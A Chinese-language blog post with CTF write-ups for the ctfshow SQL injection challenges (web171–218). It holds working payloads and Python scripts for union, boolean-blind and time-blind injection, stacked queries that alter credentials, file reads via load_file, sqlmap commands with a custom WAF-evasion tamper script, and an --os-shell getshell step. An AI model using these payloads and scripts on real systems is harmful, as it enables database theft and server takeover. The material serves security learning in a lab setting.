<!DOCTYPE html><html lang="zh-cn" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>ctfshow sql注入篇 | Pazuris - reoreo~~</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - 共 $1 行","copy":"复制","copyFinish":"复制成功","expand":"展开"}}</script><script src="//unpkg.com/valine/dist/Valine.min.js"></script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('/img/night.jpg');
  --light-background: url('/img/day.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Pazuris - reoreo~~" type="application/atom+xml">
</head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">主页</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">关于</span></a></li><li class="navItem"><a class="navBlock" href="/link/"><span class="navItemTitle">友链</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">文章</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>ctfshow sql注入篇</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2023-06-30T13:33:49.000Z" id="date"> 2023-06-30</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2023-06-30T13:35:00.102Z" id="updated"> 2023-06-30</time></div></span><br><span>文章总字数: <div class="control">3k</div></span><br><span>预计阅读时间: <div class="control">12 分钟</div></span></div></div><hr><div id="post-content"><h4 id="select无过滤"><a href="#select无过滤" class="headerlink" title="select无过滤"></a><strong>select无过滤</strong></h4><p>web171：最常规注入</p>
<p>web172：加了约束，判断回显的字段是否有flag，可以用to_base64(username)绕过，也可where</p>
<p>web173：同上</p>
<h4 id="select有过滤"><a href="#select有过滤" class="headerlink" title="select有过滤"></a>select有过滤</h4><p>web174：过滤了回显中的flag和数字0-9，两种方法绕过，一个方法是写脚本盲注，要注意用burpsuite抓包发现一个可以查询是否成功的api接口，对这个接口进行盲注爆破flag，另一个方法是将所有的数字替换成其他的字符，再逆操作解码即可。第二种方法的payload：</p>
<p>-1’ union select ‘a’,replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,”1”,”@A”),”2”,”@B”),”3”,”@C”),”4”,”@D”),”5”,”@E”),”6”,”@F”),”7”,”@G”),”8”,”@H”),”9”,”@I”),”0”,”@J”) from ctfshow_user4 where username &#x3D; ‘flag’ –+</p>
<p>用到了sql中的replace函数，python中也有相应的replace，逆操作如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">flag64 = &quot;ctfshow&#123;@Hb@Ff@De@Hd-cb@E@C-@D@A@Hd-@Ib@J@A-b@A@Feed@Ea@H@E@B@J&#125;&quot;</span><br><span class="line"></span><br><span class="line">flag = flag64.replace(&quot;@A&quot;, &quot;1&quot;).replace(&quot;@B&quot;, &quot;2&quot;).replace(&quot;@C&quot;, &quot;3&quot;).replace(&quot;@D&quot;, &quot;4&quot;).replace(&quot;@E&quot;, &quot;5&quot;).replace(</span><br><span class="line">   &quot;@F&quot;, &quot;6&quot;).replace(&quot;@G&quot;, &quot;7&quot;).replace(&quot;@H&quot;, &quot;8&quot;).replace(&quot;@I&quot;, &quot;9&quot;).replace(&quot;@J&quot;, &quot;0&quot;)</span><br><span class="line"></span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<p>web175：用正则表达式过滤掉了所有字符，只能使用盲注</p>
<p>由于查看api接口发现不管输入什么都是返回错误，只能使用时间盲注</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &quot;http://3f1538ed-4694-4f48-8879-3f4eff06167d.challenge.ctf.show/api/v5.php&quot;</span><br><span class="line">flag = &quot;&quot;</span><br><span class="line">i = 0</span><br><span class="line">while True:</span><br><span class="line">   i = i+1</span><br><span class="line">   left = 32</span><br><span class="line">   right = 127</span><br><span class="line">   while left &lt; right:</span><br><span class="line">      mid = (left+right) // 2</span><br><span class="line">      payload = f&quot;?id=1&#x27; and if(ascii(substr((select group_concat(password) from ctfshow_user5 where username=&#x27;flag&#x27;),&#123;i&#125;,1))&gt;&#123;mid&#125;,sleep(2),0) -- -&quot;</span><br><span class="line">      try:</span><br><span class="line">         res = requests.get(url = url+payload,timeout=0.6)</span><br><span class="line">         right = mid</span><br><span class="line">      except Exception as e:</span><br><span class="line">         left = mid+1</span><br><span class="line">   if left != 32:</span><br><span class="line">      flag+=chr(left)</span><br><span class="line">      print(flag)</span><br><span class="line">   else:</span><br><span class="line">      break</span><br></pre></td></tr></table></figure>

<p>一个标准的时间盲注模板，不需要引入系统时间，直接在timeout内看是否能登上网页，使用二分查找法来加速，不同的题只需要改payload和url即可</p>
<p>web176：<strong>过滤了union，select</strong>等，使用大小写混搭绕过</p>
<p>web177：176基础上<strong>过滤了空格</strong>，空格被过滤可以用，&#x2F;**&#x2F;，%09，%0a，%0b，%0c，%0d还有括号绕过，注意不能用%20，因为空格也会被解析成%20，其实根本没有绕过。</p>
<p>web178：177基础上过滤了&#x2F;**&#x2F;，依然可以用剩下的各种符号绕过</p>
<h4 id="根据查询语句绕过"><a href="#根据查询语句绕过" class="headerlink" title="根据查询语句绕过"></a>根据查询语句绕过</h4><p>web181：<strong>运算符优先级绕过</strong> payload：-1’||username&#x3D;’flag ，利用原查询中的and比后面我们自己加进来的or优先级高来绕过，前面的先进行判断，结果为错，因为没有id&#x3D;-1的列，执行后面的username&#x3D;’flag查询，得到flag</p>
<p>web187: <strong>md5(string,true)绕过</strong></p>
<p>$password &#x3D; md5($_POST[‘password’],true);</p>
<p>password&#x3D;ffifdyop或者是129581926211651571912466741651878684928可以登录成功</p>
<p>web188：<strong>mysql弱类型比较绕过</strong></p>
<p>在mysql中字符串与数字比较时，以字母为开头的字符串都会转化成0</p>
<p>因此where username&#x3D;0这个查询语句可以把所有username以字母开头的数据查出来</p>
<p>if($row[‘pass’]&#x3D;&#x3D;intval($password)){这个pass也是以字母开头的，传入0可绕过。</p>
<p><strong>注意</strong>：如果有不是以字母开头的数据就会匹配不成功，这是可以用username&#x3D;1||1来匹配，由于或的特性，这样一定会匹配成功。</p>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>web189：<strong>load_file+盲注</strong></p>
<p>题目提示flag在&#x2F;api&#x2F;index.php中，尝试用select读取发现select被屏蔽，只能使用盲注，根据上一题，尝试输入账号密码为0，提示密码错误，而把账号改成1提示查询失败，利用这个&#x2F;api&#x2F;index.php不同的返回值来做盲注</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&quot;if(load_file(&#x27;/var/www/html/api/index.php&#x27;)regexp(&#x27;&#123;0&#125;&#x27;),1,0)&quot;</span></span><br><span class="line">dic = &#123;</span><br><span class="line">			<span class="string">&quot;username&quot;</span>: payload.<span class="built_in">format</span>(flag + j),</span><br><span class="line">			<span class="comment"># 1返回\u67e5\u8be2\u5931\u8d25</span></span><br><span class="line">			<span class="string">&quot;password&quot;</span>: <span class="string">&quot;0&quot;</span></span><br><span class="line">		&#125;</span><br></pre></td></tr></table></figure>

<p>注意load_file读取一定要完整的路径，regexp用于正则匹配flag，在ctfshow{后面依次尝试添加不同的字母，若返回查询失败说明if语句返回了1，将该字母加入到flag中</p>
<p>web190：经典无过滤布尔盲注，见bool脚本，使用二分法加速</p>
<p>web191：过滤了ascii，使用ord函数替代，功能和ascii完全一致</p>
<p>web192：过滤了ord，将payload改一下，改成（注意{}加单引号表示字符）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">&quot;&#x27;or (substr((select group_concat(f1ag) from ctfshow_fl0g),&#123;&#125;,1))&gt;&#x27;&#123;&#125;&#x27;#&quot;</span>.<span class="built_in">format</span>(i,<span class="built_in">chr</span>(mid))</span><br></pre></td></tr></table></figure>

<p>将mid转化成char再进行比较，由于sql比较时会先将字符转化为大写再比较，故输出的都是大写，也可以使用枚举，不使用二分法。</p>
<p>web193：过滤了substr，可以使用left，right，mid等替换</p>
<p>同时也可以使用之前189提到的正则表达式的方式来匹配flag，就不需要对flag进行截断操作，不过这样就无法使用二分来加速且需要提前知道flag的前缀。</p>
<p>web194：同上</p>
<h4 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h4><p>web195：从本题开始<strong>堆叠注入</strong>的学习<strong>（多条组合查询，或者使用如handler等多条语句的命令，或者通过增删改查直接操作数据库来绕过验证）</strong></p>
<p>只要权限够，就可以进行<strong>增删改查</strong>，堆叠注入不是很常用，因为很容易被限制，但姿势很多，要注意积累。</p>
<p>本题采用了改的方法，将表中的pass即密码字段全部改为1，再使用0这个万能用户名可以登录获得flag。也可以使用十六进制的admin登录，为什么一定要使用十六进制呢，因为这个sql查询语句没有用引号把传入字符串包起来。</p>
<p>payload：0;update`ctf_user`set`pass&#96;&#x3D;1过滤了空格可以用反引号包住列名和表名，在handler里也有所提及。<strong>update + set</strong></p>
<p>web196：用户名不能太长，本题过滤的是se1ect并没有过滤select，使用0;select(1);前面的查询返回空，而1填入了<strong>row[0]<strong>中（row代表的是sql查询语句返回的数据，正因如此，返回逻辑中才需要用row[0]和密码比较），密码也填1即可登录。</strong>注意密码的比较逻辑</strong></p>
<p>web197：过滤了select，但没有过滤show，可以使用0;show tables，则tables返回的结果ctfshow_user填入到了**row[0]**中，密码填ctfshow_user就可登录。</p>
<p>web198：和上一题同理，同时也可以使用另一种方法，将id和pass的列名互换，然后爆破admin的id，id匹配上了就能成功登录。<strong>alter + change</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">&#x27;0x61646d696e;alter table ctfshow_user change column `pass` `gylq` varchar(255);alter table ctfshow_user change column `id` `pass` varchar(255);alter table ctfshow_user change column `gylq` `id` varchar(255);&#x27;</span></span><br></pre></td></tr></table></figure>

<p>web199-200：同理</p>
<h4 id="sqlmap练习"><a href="#sqlmap练习" class="headerlink" title="sqlmap练习"></a>sqlmap练习</h4><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/songbai220/article/details/109303110?ops_request_misc=%7B%22request_id%22:%22168299301716782425133319%22,%22scm%22:%2220140713.130102334..%22%7D&request_id=168299301716782425133319&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-109303110-null-null.142%5Ev86%5Einsert_down1,239%5Ev2%5Einsert_chatgpt&utm_term=sqlmap%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B&spm=1018.2226.3001.4187">(12条消息) sqlmap使用教程(超详细)_Redmaple925的博客-CSDN博客</a></p>
<p>web201：这一题提示需要使用–refer&#x3D;“ctf.show”绕过，同时使用–user-agent指定。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">step1：sqlmap -u [``&quot;URL&quot;``] ``//测试是否存在注入</span><br><span class="line">step2：sqlmap -u [``&quot;URL&quot;``] -current-db ``//查询当前数据库</span><br><span class="line">step3：sqlmap -u [``&quot;URL&quot;``] -D [``&quot;数据库名&quot;``] --tables ``//查询当前数据库中的所有表</span><br><span class="line">step4：sqlmap -u [``&quot;URL&quot;``] -D [``&quot;数据库名&quot;``] -T [``&quot;表名&quot;``] --columns ``//查询指定库中指定表的所有列(字段)</span><br><span class="line">step5：sqlmap -u [``&quot;URL&quot;``] -D [``&quot;数据库名&quot;``] -T [``&quot;表名&quot;``] -C [``&quot;列名&quot;``] --dump ``//打印出指定库中指定表指定列中的字段内容</span><br></pre></td></tr></table></figure>

<p>注意如果是get请求，要在url后面加上?id&#x3D;，表示id是get接收的参数</p>
<p>web202：使用–data&#x3D;“id&#x3D;1”来指定post请求，其他一样。</p>
<p>web203：使用–method&#x3D; 来指定其他请求，如本题中需要指定put请求，另外需要注意更改content-type为text&#x2F;plain,–method&#x3D;”PUT” –data&#x3D;”id&#x3D;1” –headers&#x3D;”Content-Type: text&#x2F;plain”</p>
<p>web204：在上一题的基础上加上了–cookie，使用bp抓包，把抓到的cookie填进去</p>
<p>sqlmap -u “<a target="_blank" rel="noopener" href="http://1f958108-6cb3-4246-a57e-cc16dcd0bd2a.challenge.ctf.show/api/index.php&quot;">http://1f958108-6cb3-4246-a57e-cc16dcd0bd2a.challenge.ctf.show/api/index.php&quot;</a> –data “id&#x3D;1” –method&#x3D;PUT –header&#x3D;”Content-Type:text&#x2F;plain” –cookie&#x3D;”PHPSESSID&#x3D;jg00d7vu29fi84ohkp3ksi74t8; ctfshow&#x3D;3f55bb1bfd3e87d8ffcea6d6d55ea6a0” –referer&#x3D;”ctf.show” -D ctfshow_web -T ctfshow_user</p>
<p>web205：通过bp抓包可以发现，在请求api之前，网页先请求了getToken鉴权页面，使用sqlmap的–safe-url来先访问这个安全页面，再访问进行sql测试的api页面，同时要注意–safe-freq设置成1，每次都要先访问鉴权页面</p>
<p>sqlmap -u “<a target="_blank" rel="noopener" href="http://02d91115-3218-4721-8016-a0bed82b37e3.challenge.ctf.show/api/index.php&quot;">http://02d91115-3218-4721-8016-a0bed82b37e3.challenge.ctf.show/api/index.php&quot;</a> –data “id&#x3D;1” –method&#x3D;PUT –safe-url&#x3D;”<a target="_blank" rel="noopener" href="http://02d91115-3218-4721-8016-a0bed82b37e3.challenge.ctf.show/api/getToken.php&quot;">http://02d91115-3218-4721-8016-a0bed82b37e3.challenge.ctf.show/api/getToken.php&quot;</a> –safe-freq&#x3D;1 –header&#x3D;”Content-Type:text&#x2F;plain” –cookie&#x3D;”PHPSESSID&#x3D;di7ffs2tm2hhprosgds13ga9pj” –referer&#x3D;”ctf.show” -D ctfshow_web -T ctfshow_flax –dump</p>
<p>web206：同上</p>
<p>web207：tamper初体验，–tamper&#x3D;脚本名，来调用脚本，当调用多个脚本时，脚本之间用逗号隔开，调用的脚本放在sqlmap文件夹下的tamper文件夹中。可以自己写也可以用别人写好的。</p>
<p>本题过滤了空格，直接使用别人写好的模块space2comment绕过即可成功注入。</p>
<p>web208：同上</p>
<p>web209：本题过滤了等号和空格和*号，需要绕过对等号和空格的过滤，而现成的脚本中没有这样的功能，需要我们自行写tamper，然后放进sqlmap的tamper文件夹</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.LOWEST</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dependencies</span>():</span><br><span class="line">   <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">tamper</span>(<span class="params">payload, **kwargs</span>):</span><br><span class="line">   <span class="keyword">return</span> payload.replace(<span class="string">&quot;=&quot;</span>,<span class="string">&quot; like &quot;</span>).replace(<span class="string">&quot; &quot;</span>,<span class="built_in">chr</span>(<span class="number">0x09</span>))</span><br></pre></td></tr></table></figure>

<p>tamper分三部分，优先级，适用情况，主要函数（接受的参数为payload和**kwargs。返回值为替换后的payload，要替换的就是payload，来完成想要的绕过。kwargs是修改http头里的内容函数）</p>
<p>web210：同上，自写tamper对waf的操作进行反操作或者绕过。</p>
<p>web211：同上，绕过加反操作，自写的脚本详见myTamper</p>
<p>web212：同上</p>
<p>web213：使用sqlmap的–os-shell来获取网站的shell</p>
<p>getshell条件：</p>
<p>1.网站必须是root权限<br>2.知道网站的绝对路径<br>3.PHP关闭魔术引号，php主动转义功能关闭<br>4.secure_file_priv&#x3D;值为空</p>
<p>getshell成功上传文件之后可以使用菜刀连接或者直接在终端输命令即可 ls &#x2F;</p>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><p>web214：啥提示都没有，返回index.php页面，web题遇到啥都没有的情况可以通过bp抓一下包看看有没有什么突破口。</p>
<p>抓包发现网页通过post方法提交了一个ip和一个debug，debug设置为0，修改debug为1出现了查询语句，由于正误无任何回显，故采用基于时间的盲注，本题为标准时间盲注模板。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://52996c56-6c23-4abb-8c0b-545755d9cb91.challenge.ctf.show/api/&quot;</span></span><br><span class="line">chars = <span class="string">&#x27;abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&amp;*()-=&#123;&#125;_,&#x27;</span></span><br><span class="line">result = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">666</span>):</span><br><span class="line">	left = <span class="number">32</span></span><br><span class="line">	right = <span class="number">127</span></span><br><span class="line">	<span class="keyword">while</span> left &lt; right:</span><br><span class="line">		mid = (left+right)//<span class="number">2</span></span><br><span class="line">		payload = <span class="string">&quot;if(ascii(substr((select flaga from ctfshow_flagx),&#123;&#125;,1))&gt;&#123;&#125;,sleep(1),1)&quot;</span></span><br><span class="line">		<span class="comment"># payload = &quot;if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27;,sleep(5),0)&quot;</span></span><br><span class="line">		<span class="comment"># payload = &quot;if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;ctfshow_flagx&#x27;),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27;,sleep(5),0)&quot;</span></span><br><span class="line">		data = &#123;</span><br><span class="line">			<span class="string">&quot;ip&quot;</span>: payload.<span class="built_in">format</span>(i, mid),</span><br><span class="line">			<span class="string">&quot;debug&quot;</span>: <span class="string">&#x27;0&#x27;</span></span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">try</span>:</span><br><span class="line">			r = requests.post(url, data=data, timeout=<span class="number">1</span>)</span><br><span class="line">			right = mid</span><br><span class="line">		<span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">			left = mid + <span class="number">1</span></span><br><span class="line">	result += <span class="built_in">chr</span>(left)</span><br><span class="line">	<span class="built_in">print</span>(result)</span><br></pre></td></tr></table></figure>



<p>web215：加了单引号，修改脚本的payload至闭合查询语句即可。</p>
<p>web216：注意闭合查询语句，且前面的base64已经被闭合了，故不需要对我们的if语句进行处理，直接用上一题脚本微改即可。</p>
<p>web217：过滤了sleep函数，使用benchmark(5000000,sha(1))来代替sleep(3)，benchmark第一个参数表示计算重复的次数，第二个参数表示计算的式子，同样能起到延时的作用。</p>
<p>web218：过滤了sleep和benchmark，可以使用heavy query方法，heavy query顾名思义就是通过做大量的查询导致查询时间较长来达到延时的目的。</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/06/30/Python%E5%9F%BA%E7%A1%80/">← Next Python基础</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/06/30/JavaScript/">JavaScript快速入门 Prev →</a></div></div></div><div id="comments"><div class="selector"><button class="valine-sel"></button></div><div id="valine"></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="文章目录">≡</a><a id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/3.png" alt="Logo"></a><h1 id="Dr"><a href="/">Pazuris</a></h1><div id="description"><p>Fear neither hardship nor darkness</p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#select%E6%97%A0%E8%BF%87%E6%BB%A4"><span class="toc-number">1.</span> <span class="toc-text">select无过滤</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#select%E6%9C%89%E8%BF%87%E6%BB%A4"><span class="toc-number">2.</span> <span class="toc-text">select有过滤</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A0%B9%E6%8D%AE%E6%9F%A5%E8%AF%A2%E8%AF%AD%E5%8F%A5%E7%BB%95%E8%BF%87"><span class="toc-number">3.</span> <span class="toc-text">根据查询语句绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="toc-number">4.</span> <span class="toc-text">布尔盲注</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="toc-number">5.</span> <span class="toc-text">堆叠注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sqlmap%E7%BB%83%E4%B9%A0"><span class="toc-number">6.</span> <span class="toc-text">sqlmap练习</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-number">7.</span> <span class="toc-text">时间盲注</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {new Valine({
 el: '#valine'
 , appId: 'jNCx4oTIrrhkD2wzgcrsZ9gC-gzGzoHsz'
 , appKey: '1Q3B3CoVNhzedJtV4GCO307Q' , placeholder: '此条评论委托企鹅物流发送'
 , path: window.location.pathname
});code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>